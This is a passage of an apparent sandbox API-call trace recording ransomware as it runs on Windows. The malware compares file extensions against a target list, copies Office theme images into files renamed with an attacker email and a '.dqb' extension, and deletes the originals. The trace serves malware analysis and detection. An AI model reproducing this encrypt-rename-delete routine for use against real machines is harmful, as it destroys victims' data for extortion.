Files\\Microsoft Shared\\THEMES14\\CASCADE\\PREVIEW.GIF") returned 75 [0043.497] lstrlenW (lpString=".dbf") returned 4 [0043.497] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0043.498] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CASCADE\\PREVIEW.GIF") returned 75 [0043.498] lstrlenW (lpString=".1cd") returned 4 [0043.498] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0043.498] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CASCADE\\PREVIEW.GIF") returned 75 [0043.498] lstrlenW (lpString=".jpg") returned 4 [0043.498] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0043.498] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CASCADE\\PREVIEW.GIF") returned 75 [0043.498] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CASCADE\\PREVIEW.GIF") returned 75 [0043.498] lstrlenW (lpString=".doc") returned 4 [0043.498] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0043.498] lstrlenW (lpString=".docx") returned 5 [0043.498] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1 [0043.498] lstrlenW (lpString=".pdf") returned 4 [0043.498] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0043.498] lstrlenW (lpString=".xls") returned 4 [0043.498] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0043.498] lstrlenW (lpString=".xlsx") returned 5 [0043.498] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1 [0043.498] lstrlenW (lpString=".ppt") returned 4 [0043.498] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0043.498] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CASCADE\\PREVIEW.GIF") returned 75 [0043.498] lstrlenW (lpString=".zip") returned 4 [0043.498] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0043.498] lstrlenW (lpString=".rar") returned 4 [0043.498] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0043.498] lstrlenW (lpString=".bz2") returned 4 [0043.498] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0043.498] lstrlenW (lpString=".7z") returned 3 [0043.498] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0043.498] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CASCADE\\PREVIEW.GIF") returned 75 [0043.498] lstrlenW (lpString=".dbf") returned 4 [0043.498] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0043.498] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CASCADE\\PREVIEW.GIF") returned 75 [0043.498] lstrlenW (lpString=".1cd") returned 4 [0043.498] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0043.498] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CASCADE\\PREVIEW.GIF") returned 75 [0043.499] lstrlenW (lpString=".jpg") returned 4 [0043.499] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0043.499] lstrcmpiW (lpString1=".PNG", lpString2=".dqb") returned 1 [0043.499] lstrlenW (lpString="THMBNAIL.PNG") returned 12 [0043.499] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CASCADE\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\cascade\\thmbnail.png"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0043.499] GetFileSizeEx (in: hFile=0x17c, lpFileSize=0x227ff1c | out: lpFileSize=0x227ff1c*=20371) returned 1 [0043.499] CloseHandle (hObject=0x17c) returned 1 [0043.499] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CASCADE\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\cascade\\thmbnail.png")) returned 0x20 [0043.499] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CASCADE\\THMBNAIL.PNG.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\cascade\\thmbnail.png.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0043.499] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CASCADE\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\cascade\\thmbnail.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0043.499] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x227fec8 | out: lpNewFilePointer=0x0) returned 1 [0043.499] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x227fec8 | out: lpNewFilePointer=0x0) returned 1 [0043.499] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CASCADE\\THMBNAIL.PNG.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\cascade\\thmbnail.png.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0043.500] GetLastError () returned 0x0 [0043.500] ReadFile (in: hFile=0x17c, lpBuffer=0x3540020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x227fed4, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesRead=0x227fed4*=0x4f93, lpOverlapped=0x0) returned 1 [0043.501] WriteFile (in: hFile=0x178, lpBuffer=0x3540020*, nNumberOfBytesToWrite=0x4fa0, lpNumberOfBytesWritten=0x227fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesWritten=0x227fc9c*=0x4fa0, lpOverlapped=0x0) returned 1 [0043.502] ReadFile (in: hFile=0x17c, lpBuffer=0x3540020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x227fed4, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesRead=0x227fed4*=0x0, lpOverlapped=0x0) returned 1 [0043.502] WriteFile (in: hFile=0x178, lpBuffer=0x3540020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x227fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesWritten=0x227fc9c*=0xec, lpOverlapped=0x0) returned 1 [0043.503] SetEndOfFile (hFile=0x178) returned 1 [0043.503] CloseHandle (hObject=0x178) returned 1 [0043.503] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x227fec8 | out: lpNewFilePointer=0x0) returned 1 [0043.503] SetEndOfFile (hFile=0x17c) returned 1 [0043.504] CloseHandle (hObject=0x17c) returned 1 [0043.504] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CASCADE\\THMBNAIL.PNG.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0043.504] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CASCADE\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\cascade\\thmbnail.png")) returned 1 [0043.504] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CASCADE\\THMBNAIL.PNG") returned 76 [0043.504] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CASCADE\\THMBNAIL.PNG") returned 76 [0043.504] lstrlenW (lpString=".doc") returned 4 [0043.504] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1 [0043.504] lstrlenW (lpString=".docx") returned 5 [0043.504] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1 [0043.504] lstrlenW (lpString=".pdf") returned 4 [0043.504] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1 [0043.504] lstrlenW (lpString=".xls") returned 4 [0043.504] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1 [0043.504] lstrlenW (lpString=".xlsx") returned 5 [0043.504] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1 [0043.504] lstrlenW (lpString=".ppt") returned 4 [0043.504] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1 [0043.504] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CASCADE\\THMBNAIL.PNG") returned 76 [0043.504] lstrlenW (lpString=".zip") returned 4 [0043.504] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1 [0043.504] lstrlenW (lpString=".rar") returned 4 [0043.504] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1 [0043.505] lstrlenW (lpString=".bz2") returned 4 [0043.505] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1 [0043.505] lstrlenW (lpString=".7z") returned 3 [0043.505] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1 [0043.505] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CASCADE\\THMBNAIL.PNG") returned 76 [0043.505] lstrlenW (lpString=".dbf") returned 4 [0043.505] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1 [0043.505] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CASCADE\\THMBNAIL.PNG") returned 76 [0043.505] lstrlenW (lpString=".1cd") returned 4 [0043.505] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1 [0043.505] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CASCADE\\THMBNAIL.PNG") returned 76 [0043.505] lstrlenW (lpString=".jpg") returned 4 [0043.505] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1 [0043.505] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CASCADE\\THMBNAIL.PNG") returned 76 [0043.505] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CASCADE\\THMBNAIL.PNG") returned 76 [0043.505] lstrlenW (lpString=".doc") returned 4 [0043.505] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1 [0043.505] lstrlenW (lpString=".docx") returned 5 [0043.505] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1 [0043.505] lstrlenW (lpString=".pdf") returned 4 [0043.505] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1 [0043.505] lstrlenW (lpString=".xls") returned 4 [0043.505] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1 [0043.505] lstrlenW (lpString=".xlsx") returned 5 [0043.505] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1 [0043.505] lstrlenW (lpString=".ppt") returned 4 [0043.505] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1 [0043.505] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CASCADE\\THMBNAIL.PNG") returned 76 [0043.505] lstrlenW (lpString=".zip") returned 4 [0043.505] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1 [0043.505] lstrlenW (lpString=".rar") returned 4 [0043.505] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1 [0043.505] lstrlenW (lpString=".bz2") returned 4 [0043.505] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1 [0043.505] lstrlenW (lpString=".7z") returned 3 [0043.505] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1 [0043.506] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CASCADE\\THMBNAIL.PNG") returned 76 [0043.506] lstrlenW (lpString=".dbf") returned 4 [0043.506] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1 [0043.506] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CASCADE\\THMBNAIL.PNG") returned 76 [0043.506] lstrlenW (lpString=".1cd") returned 4 [0043.506] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1 [0043.506] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CASCADE\\THMBNAIL.PNG") returned 76 [0043.506] lstrlenW (lpString=".jpg") returned 4 [0043.506] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1 [0043.506] lstrcmpiW (lpString1=".GIF", lpString2=".dqb") returned 1 [0043.506] lstrlenW (lpString="PREVIEW.GIF") returned 11 [0043.506] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\COMPASS\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\compass\\preview.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0043.506] GetFileSizeEx (in: hFile=0x17c, lpFileSize=0x227ff1c | out: lpFileSize=0x227ff1c*=1293) returned 1 [0043.506] CloseHandle (hObject=0x17c) returned 1 [0043.506] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\COMPASS\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\compass\\preview.gif")) returned 0x20 [0043.506] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\COMPASS\\PREVIEW.GIF.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\compass\\preview.gif.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0043.506] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\COMPASS\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\compass\\preview.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0043.507] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x227fec8 | out: lpNewFilePointer=0x0) returned 1 [0043.507] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x227fec8 | out: lpNewFilePointer=0x0) returned 1 [0043.507] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\COMPASS\\PREVIEW.GIF.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\compass\\preview.gif.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0043.508] GetLastError () returned 0x0 [0043.508] ReadFile (in: hFile=0x17c, lpBuffer=0x3540020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x227fed4, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesRead=0x227fed4*=0x50d, lpOverlapped=0x0) returned 1 [0043.509] WriteFile (in: hFile=0x178, lpBuffer=0x3540020*, nNumberOfBytesToWrite=0x510, lpNumberOfBytesWritten=0x227fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesWritten=0x227fc9c*=0x510, lpOverlapped=0x0) returned 1 [0043.510] ReadFile (in: hFile=0x17c, lpBuffer=0x3540020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x227fed4, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesRead=0x227fed4*=0x0, lpOverlapped=0x0) returned 1 [0043.510] WriteFile (in: hFile=0x178, lpBuffer=0x3540020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x227fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesWritten=0x227fc9c*=0xea, lpOverlapped=0x0) returned 1 [0043.511] SetEndOfFile (hFile=0x178) returned 1 [0043.511] CloseHandle (hObject=0x178) returned 1 [0043.511] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x227fec8 | out: lpNewFilePointer=0x0) returned 1 [0043.511] SetEndOfFile (hFile=0x17c) returned 1 [0043.512] CloseHandle (hObject=0x17c) returned 1 [0043.512] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\COMPASS\\PREVIEW.GIF.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0043.512] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\COMPASS\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\compass\\preview.gif")) returned 1 [0043.512] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\COMPASS\\PREVIEW.GIF") returned 75 [0043.512] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\COMPASS\\PREVIEW.GIF") returned 75 [0043.512] lstrlenW (lpString=".doc") returned 4 [0043.512] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0043.512] lstrlenW (lpString=".docx") returned 5 [0043.512] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1 [0043.512] lstrlenW (lpString=".pdf") returned 4 [0043.512] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0043.512] lstrlenW (lpString=".xls") returned 4 [0043.512] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0043.512] lstrlenW (lpString=".xlsx") returned 5 [0043.512] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1 [0043.512] lstrlenW (lpString=".ppt") returned 4 [0043.512] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0043.512] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\COMPASS\\PREVIEW.GIF") returned 75 [0043.512] lstrlenW (lpString=".zip") returned 4 [0043.512] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0043.512] lstrlenW (lpString=".rar") returned 4 [0043.512] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0043.512] lstrlenW (lpString=".bz2") returned 4 [0043.513] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0043.513] lstrlenW (lpString=".7z") returned 3 [0043.513] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0043.513] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\COMPASS\\PREVIEW.GIF") returned 75 [0043.513] lstrlenW (lpString=".dbf") returned 4 [0043.513] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0043.513] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\COMPASS\\PREVIEW.GIF") returned 75 [0043.513] lstrlenW (lpString=".1cd") returned 4 [0043.513] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0043.513] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\COMPASS\\PREVIEW.GIF") returned 75 [0043.513] lstrlenW (lpString=".jpg") returned 4 [0043.513] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0043.513] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\COMPASS\\PREVIEW.GIF") returned 75 [0043.513] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\COMPASS\\PREVIEW.GIF") returned 75 [0043.513] lstrlenW (lpString=".doc") returned 4 [0043.513] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0043.513] lstrlenW (lpString=".docx") returned 5 [0043.513] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1 [0043.513] lstrlenW (lpString=".pdf") returned 4 [0043.513] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0043.513] lstrlenW (lpString=".xls") returned 4 [0043.513] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0043.513] lstrlenW (lpString=".xlsx") returned 5 [0043.513] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1 [0043.513] lstrlenW (lpString=".ppt") returned 4 [0043.513] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0043.513] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\COMPASS\\PREVIEW.GIF") returned 75 [0043.513] lstrlenW (lpString=".zip") returned 4 [0043.513] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0043.513] lstrlenW (lpString=".rar") returned 4 [0043.513] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0043.513] lstrlenW (lpString=".bz2") returned 4 [0043.513] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0043.513] lstrlenW (lpString=".7z") returned 3 [0043.513] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0043.513] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\COMPASS\\PREVIEW.GIF") returned 75 [0043.514] lstrlenW (lpString=".dbf") returned 4 [0043.514] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0043.514] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\COMPASS\\PREVIEW.GIF") returned 75 [0043.514] lstrlenW (lpString=".1cd") returned 4 [0043.514] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0043.514] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\COMPASS\\PREVIEW.GIF") returned 75 [0043.514] lstrlenW (lpString=".jpg") returned 4 [0043.514] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0043.514] lstrcmpiW (lpString1=".PNG", lpString2=".dqb") returned 1 [0043.514] lstrlenW (lpString="THMBNAIL.PNG") returned 12 [0043.514] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\COMPASS\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\compass\\thmbnail.png"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0043.514] GetFileSizeEx (in: hFile=0x17c, lpFileSize=0x227ff1c | out: lpFileSize=0x227ff1c*=20575) returned 1 [0043.514] CloseHandle (hObject=0x17c) returned 1 [0043.514] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\COMPASS\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\compass\\thmbnail.png")) returned 0x20 [0043.514] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\COMPASS\\THMBNAIL.PNG.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\compass\\thmbnail.png.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0043.514] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\COMPASS\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\compass\\thmbnail.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0043.514] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x227fec8 | out: lpNewFilePointer=0x0) returned 1 [0043.515] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x227fec8 | out: lpNewFilePointer=0x0) returned 1 [0043.515] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\COMPASS\\THMBNAIL.PNG.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\compass\\thmbnail.png.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0043.515] GetLastError () returned 0x0 [0043.515] ReadFile (in: hFile=0x17c, lpBuffer=0x3540020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x227fed4, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesRead=0x227fed4*=0x505f, lpOverlapped=0x0) returned 1 [0043.516] WriteFile (in: hFile=0x178, lpBuffer=0x3540020*, nNumberOfBytesToWrite=0x5060, lpNumberOfBytesWritten=0x227fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesWritten=0x227fc9c*=0x5060, lpOverlapped=0x0) returned 1 [0043.517] ReadFile (in: hFile=0x17c, lpBuffer=0x3540020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x227fed4, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesRead=0x227fed4*=0x0, lpOverlapped=0x0) returned 1 [0043.518] WriteFile (in: hFile=0x178, lpBuffer=0x3540020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x227fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesWritten=0x227fc9c*=0xec, lpOverlapped=0x0) returned 1 [0043.518] SetEndOfFile (hFile=0x178) returned 1 [0043.518] CloseHandle (hObject=0x178) returned 1 [0043.518] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x227fec8 | out: lpNewFilePointer=0x0) returned 1 [0043.518] SetEndOfFile (hFile=0x17c) returned 1 [0043.519] CloseHandle (hObject=0x17c) returned 1 [0043.519] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\COMPASS\\THMBNAIL.PNG.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0043.519] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\COMPASS\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\compass\\thmbnail.png")) returned 1 [0043.519] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\COMPASS\\THMBNAIL.PNG") returned 76 [0043.519] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\COMPASS\\THMBNAIL.PNG") returned 76 [0043.519] lstrlenW (lpString=".doc") returned 4 [0043.519] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1 [0043.519] lstrlenW (lpString=".docx") returned 5 [0043.519] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1 [0043.519] lstrlenW (lpString=".pdf") returned 4 [0043.519] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1 [0043.519] lstrlenW (lpString=".xls") returned 4 [0043.519] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1 [0043.519] lstrlenW (lpString=".xlsx") returned 5 [0043.519] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1 [0043.519] lstrlenW (lpString=".ppt") returned 4 [0043.520] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1 [0043.520] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\COMPASS\\THMBNAIL.PNG") returned 76 [0043.520] lstrlenW (lpString=".zip") returned 4 [0043.520] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1 [0043.520] lstrlenW (lpString=".rar") returned 4 [0043.520] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1 [0043.520] lstrlenW (lpString=".bz2") returned 4 [0043.520] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1 [0043.520] lstrlenW (lpString=".7z") returned 3 [0043.520] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1 [0043.520] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\COMPASS\\THMBNAIL.PNG") returned 76 [0043.520] lstrlenW 